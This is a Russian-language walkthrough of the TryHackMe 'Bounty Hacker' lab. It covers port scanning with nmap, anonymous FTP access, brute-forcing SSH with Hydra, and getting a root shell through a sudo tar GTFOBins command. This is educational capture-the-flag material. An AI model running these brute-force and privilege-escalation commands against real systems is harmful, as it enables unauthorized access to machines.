Перейти к содержанию

Bounty Hacker

Основная задача - закрепление элементарных базовых навыков: разведки, брутфорса, эскалации привилегий.
Описание задания можно найти на TryHackme.

Сканирование и эксплуатация

Проведение разведки с nmap на предмет наличия открытых портов:

sudo nmap -T4  -p- IP-ADDRESS
#После получения сведений о портах
sudo nmap -sV -sC -O -p 21,22,80 $IP-ADDRESS

Обнаружены открытые порты 21, 22, 80.
Получены версии, наименования ПО работающего на открытых портах

Изучаем source code страниц web сайта, не находим ничего интересного.

Пробуем подключится к ftp анонимным пользователем: 

ftp IP-ADDRESS 21
Connected to IP-ADDRESS.
220 (vsFTPd 3.0.3)
Name (IP-ADDRESS:root): anonymous 
230 Login successful.
Скачиваем имеющиеся текстовые файлы. В одном из них находим информацию об имени пользователя, второй является списком возможных паролей.

Брутим пароль к ssh Гидрой: 

hydra -l USERNAME -P PASS-LIST IP-ADDRESS ssh

Подключаемся к станции, через sudo -l узнаём, что можно запускать tar. Идём на GTOFBins, получаем информацию об эскплуатации, получаем root shell: 

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh